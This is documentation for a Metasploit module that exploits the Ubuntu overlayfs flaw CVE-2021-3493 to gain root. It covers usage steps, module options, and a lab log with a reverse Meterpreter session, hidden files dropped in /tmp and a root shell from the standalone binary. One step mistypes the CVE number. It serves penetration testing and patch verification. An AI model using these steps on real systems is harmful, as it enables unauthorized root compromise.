## Vulnerable Application

This module exploits a vulnerability in Ubuntu's implementation of overlayfs.  The
vulnerability is the result of failing to verify the ability of a user to set the
attributes in a running executable. Specifically, when Overlayfs sends the set attributes
data to the underlying file system via `vfs_setxattr`, it fails to first verify the data
by calling `cap_convert_nscap`.
This vulnerability was patched by moving the call to `cap_convert_nscap`
into the `vfs_setxattr` function that sets the attribute, forcing verification every time the
`vfs_setxattr` is called rather than trusting the data was already verified.

### Install

Install Ubuntu from version 14.04LTS to 20.04 LTS

## Verification Steps

1. Make an Ubuntu
1. Create a meterpreter or shell payload and upload it to the Ubuntu target
1. Set up a handler for the payload
1. Launch the payload as a regular user on the Ubuntu Target and connect the handler
1. Do: `use exploit/linux/local/cve_2021_3943_overlayfs`
1. Do: `set payload <payload>`
1. Do: `set lhost <ip>`
1. Do: `set [r|l]port <port>`
1. Do: `run`
1. You should get a root session

## Options

### COMPILE

[Auto|True|False] This selects the binary to use.  True will upload the source code and perform
compilation on target, False will upload a precompiled binary.  AUTO will favor compiling on target
but will fall back to the precompiled option if a compiler cannot be found.

### WritableDir
This indicates the location where you would like the payload and exploit binary stored, as well
as serving as a location to store the various files and directories created by the exploit itself.
The default value is `/tmp`

### Ubuntu 20.04.0 x64

```
msf exploit(linux/local/cve_2021_3493_overlayfs) > 
[*] Sending stage (3012548 bytes) to 192.168.132.138
[*] Meterpreter session 9 opened (192.168.135.197:4567 -> 192.168.132.138:47988 ) at 2021-11-09 11:34:44 -0600

msf exploit(linux/local/cve_2021_3493_overlayfs) > sessions -i 9
[*] Starting interaction with 9...

meterpreter > sysinfo
Computer     : ubuntu-20.04.0
OS           : Ubuntu 20.04 (Linux 5.4.0-26-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: msfuser
meterpreter > background
[*] Backgrounding session 9...
msf exploit(linux/local/cve_2021_3493_overlayfs) > set session 9
session => 9
msf exploit(linux/local/cve_2021_3493_overlayfs) > run

[*] Started reverse TCP handler on 192.168.135.197:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Version array: ["5.4.0", "26", "generic"]
[*] major_version: 5.4.0
[*] minor_version: 26
[+] The target appears to be vulnerable.
[*] Creating directory /tmp/.wH0xRHji
[*] /tmp/.wH0xRHji created
[*] Dropping pre-compiled exploit on system...
[*] Writing '/tmp/.wH0xRHji/.PsJzzn' (17840 bytes) ...
[*] Writing '/tmp/.wH0xRHji/.Doeg4dSW1G' (250 bytes) ...
[*] Launching exploit...
[*] Running: /tmp/.wH0xRHji/.PsJzzn /tmp/.wH0xRHji/.Doeg4dSW1G /tmp/.wH0xRHji 6PFbO1d
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3012548 bytes) to 192.168.132.138
[+] Deleted /tmp/.wH0xRHji/.PsJzzn
[*] Meterpreter session 10 opened (192.168.135.197:4444 -> 192.168.132.138:41814 ) at 2021-11-09 11:35:05 -0600
[*] 

meterpreter > getuid
Server username: root
```

### Included Binaries
The binaries used by this exploit `data/exploits/CVE-2021-3493/cve_2021_3493.x64.elf` and
`data/exploits/CVE-2021-3493/cve_2021_3493.x64.elf` can and be used separately from
metasploit.  The parameters required are:
```
    // argv[1] = The payload or executable you wish to launch
    // argv[2] = A directory to store the files and directories created when the exploit runs
    // argv[3] = A random string that is used to create directory names.
```
```
msfuser@ubuntu-18041:~$ id
uid=1000(msfuser) gid=1000(msfuser) groups=1000(msfuser),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
msfuser@ubuntu-18041:~$ mkdir /tmp/test
msfuser@ubuntu-18041:~$ ./cve_2021_3493.x64.elf /bin/bash /tmp/test abcdef
root@ubuntu-18041:~# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare),1000(msfuser)
root@ubuntu-18041:~# 
```

